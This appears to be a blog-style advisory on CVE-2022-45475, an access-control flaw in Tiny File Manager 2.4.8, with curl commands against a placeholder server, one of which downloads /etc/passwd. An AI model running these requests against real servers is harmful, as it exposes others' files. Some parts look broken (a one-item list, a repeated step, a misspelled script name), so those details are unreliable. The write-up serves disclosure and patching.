CVE-2022-45475 - How Tiny File Manager 2.4.8 Exposes Files to Anyone

If you’re running Tiny File Manager version 2.4.8, your files might be exposed to anyone on the internet—no login needed. A broken access control bug (CVE-2022-45475) lets attackers freely browse, download, or manipulate files. This post breaks down what makes the vulnerability possible, shows how it can be exploited, offers code snippets, and suggests what to do next.

What is Tiny File Manager?

Tiny File Manager is a lightweight, single-file PHP web app for managing files in the browser. It's popular because it's easy to set up and super simple to use. But sometimes, simple means skipping important security steps.

How Bad is CVE-2022-45475?

Critical. This bug lets anyone access the app’s file management UI—even if they’re not logged in. There’s no authentication step stopping outsiders from poking around your files. They can:

Delete files

If you use Tiny File Manager to organize sensitive data, this is a big problem.

Why Did This Happen?

The root cause is broken access control. The app is supposed to check if users are logged in before letting them access any files. But due to an oversight in the coding, this check is missing or can be easily bypassed in version 2.4.8.

Think of it like this:  
You lock the front door but accidentally leave the back door open—and slap a giant WELCOME mat out there.

Open a browser and point it at Tiny File Manager’s main script. That’s usually something like

http://<victim-server>/tinyfilemanager.php

You’ll see the file manager interface, *no login screen at all*! If authentication is present, it can be easily bypassed because of the logic flaw. Now all actions (view, upload, delete) are unlocked.

Here’s a curl command that fetches the root directory listing

curl http://victim-server/tinyfilemanager.php

The returned HTML is the file/folder list, just as if you were an authenticated user.

Want to read a private file? For example, to read /etc/passwd (on Unix-like systems)

curl "http://victim-server/tinyfilemanager.php?op=download&path=/etc&name=passwd"

Note: The actual parameters (op, path, name) may vary depending on configuration, but these are commonly used in Tiny File Manager.

Just open the vulnerable PHP file directly

http://victim-server/tinyfilemanager.php

You’ll get the full-featured file manager interface without needing a password.

The Original Disclosure

This bug was disclosed on GitHub and tracked on MITRE’s CVE site:

- CVE-2022-45475 at NVD
- Original Issue on GitHub
- Exploit details

An anonymous researcher showed that tinymfilemanager.php just doesn’t block anyone from accessing file functions.

Upgrade Tiny File Manager

- Download the latest version from GitHub.

Summary

CVE-2022-45475 shows how skipping basic security checks can put your whole server at risk. Upgrading Tiny File Manager or blocking its access is urgent if you care about your files’ privacy.

Don’t let your stuff hang out in the open. Patch it now!

References  
- Tiny File Manager GitHub  
- CVE-2022-45475 (NVD)  
- Exploit-DB Entry  
- GitHub Issue #315 – Original Disclosure  


*Stay safe and keep your file managers locked down!*

Timeline

Published on: 11/25/2022 18:15:00 UTC
Last modified on: 02/01/2023 15:34:00 UTC